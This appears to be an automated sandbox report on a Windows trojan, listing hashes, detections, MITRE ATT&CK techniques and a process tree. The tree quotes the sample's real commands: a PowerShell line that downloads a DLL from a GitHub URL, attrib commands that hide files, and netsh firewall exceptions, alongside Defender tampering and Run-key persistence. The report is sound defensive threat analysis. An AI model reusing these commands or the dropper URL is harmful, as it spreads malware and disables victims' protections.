Overview

overview

10

Static

static

10

361a99ef21...74.exe

windows7-x64

10

361a99ef21...74.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    143s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20250207-en
  • resource tags

    arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system
  • submitted
    17-02-2025 02:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    361a99ef210f2f204f1ed6057e6e6c27a772aee6fcde7e41e914b816e5ea9174.exe

  • Size

    36KB

  • MD5

    03f6e22347844b1c83b8b3a52ae0a798

  • SHA1

    317198a65c39c56ca0a5b32c6f9ba9712b68e326

  • SHA256

    361a99ef210f2f204f1ed6057e6e6c27a772aee6fcde7e41e914b816e5ea9174

  • SHA512

    a85bd36cb38ff57d687f1ab41d0fcfe82f88cdd554d66813bf789e0ab7bd90c2f41c7fca8a486c5f187e1776e344977ac998f5c85d2c6200be2cd2fa999d7777

  • SSDEEP

    768:Z45PqAxhRAfy0vq/hykAvgXYPv9kj2Y3qjhSKM91g:e5PqAFADtvgo39s3qjh5gi

Score
10/10
defense_evasiondiscoveryevasionexecutionpersistenceprivilege_escalationtrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/NGROKC/CTC/raw/main/CTC64.dll

Signatures

  • Contains code to disable Windows Defender 3 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Blocklisted process makes network request 2 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
    defense_evasion
  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    defense_evasion
  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 30 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Views/modifies file attributes 1 TTPs 2 IoCs
    defense_evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\361a99ef210f2f204f1ed6057e6e6c27a772aee6fcde7e41e914b816e5ea9174.exe
    "C:\Users\Admin\AppData\Local\Temp\361a99ef210f2f204f1ed6057e6e6c27a772aee6fcde7e41e914b816e5ea9174.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2456
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\361a99ef210f2f204f1ed6057e6e6c27a772aee6fcde7e41e914b816e5ea9174.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1180
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\361a99ef210f2f204f1ed6057e6e6c27a772aee6fcde7e41e914b816e5ea9174.exe"
        3⤵
        • Sets file to hidden
        • System Location Discovery: System Language Discovery
        • Views/modifies file attributes
        PID:1716
    • C:\ProgramData\$77-.exe
      "C:\ProgramData\$77-.exe"
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • Modifies Windows Defender TamperProtection settings
      • Drops startup file
      • Executes dropped EXE
      • Windows security modification
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3008
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c attrib +s +h +r "C:\ProgramData\$77-.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2760
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +h +r "C:\ProgramData\$77-.exe"
          4⤵
          • Sets file to hidden
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:2972
      • C:\Windows\SysWOW64\netsh.exe
        netsh firewall add allowedprogram "C:\ProgramData\$77-.exe" "$77-.exe" ENABLE
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:2708
      • C:\Windows\SysWOW64\netsh.exe
        netsh firewall add allowedprogram "C:\ProgramData\$77-.exe" "$77-.exe" ENABLE
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:2704
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Rot.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2620
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/CTC64.dll','C:\ProgramData\\r77-x64.dll');exit
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2600
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell" Get-MpPreference -verbose
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2776
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3036

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Create or Modify System Process

3
T1543

Windows Service

3
T1543.003

Event Triggered Execution

1
T1546

Netsh Helper DLL

1
T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Create or Modify System Process

3
T1543

Windows Service

3
T1543.003

Event Triggered Execution

1
T1546

Netsh Helper DLL

1
T1546.007

Defense Evasion

Hide Artifacts

2
T1564

Hidden Files and Directories

2
T1564.001

Impair Defenses

4
T1562

Disable or Modify System Firewall

1
T1562.004

Disable or Modify Tools

3
T1562.001

Modify Registry

4
T1112

Credential Access

Discovery

System Information Discovery

1
T1082

System Location Discovery

1
T1614

System Language Discovery

1
T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1
T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Rot.bat
    Filesize

    235B

    MD5

    fa2df82470638d18f85bc54dd7f001aa

    SHA1

    eae60eab30561b413dba2924782a858722c0ecbe

    SHA256

    ab41cefaca31b47651bcc22adf49d17a7fe094bcee8ee1cdc4d60ad4c6b5a604

    SHA512

    f17f20809c2a7f89925171d07fa3a4c7215274595e0eb2de8ce50ae466120ead7355224a1a830a023ac2a0abcb0c1932221d3c2c880b797d7bbb4bc5445326aa

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    4cca5e8b7e3bdbf8da50c490bb89dbed

    SHA1

    837348d7d9a908e82b0a8100b778fcc05543a81f

    SHA256

    91871e3c5ef36416be1cf20769c7420372d0189c2c48630d3437d7bc89813986

    SHA512

    31a6992946f6f56defac2c03adba9ef73eec89384b564a7d345384ab69ca2963870ba3091151f41a189e22686c501696b8c7a873ccd65383d7b9eb6eedda1c9c

    Download Submit

  • \ProgramData\$77-.exe
    Filesize

    36KB

    MD5

    03f6e22347844b1c83b8b3a52ae0a798

    SHA1

    317198a65c39c56ca0a5b32c6f9ba9712b68e326

    SHA256

    361a99ef210f2f204f1ed6057e6e6c27a772aee6fcde7e41e914b816e5ea9174

    SHA512

    a85bd36cb38ff57d687f1ab41d0fcfe82f88cdd554d66813bf789e0ab7bd90c2f41c7fca8a486c5f187e1776e344977ac998f5c85d2c6200be2cd2fa999d7777

    Download Submit

  • memory/2456-0-0x000000007462E000-0x000000007462F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2456-1-0x0000000000A20000-0x0000000000A30000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3008-9-0x0000000000CA0000-0x0000000000CB0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3008-10-0x0000000074620000-0x0000000074D0E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/3008-23-0x0000000074620000-0x0000000074D0E000-memory.dmp

    Filesize

    6.9MB

    Download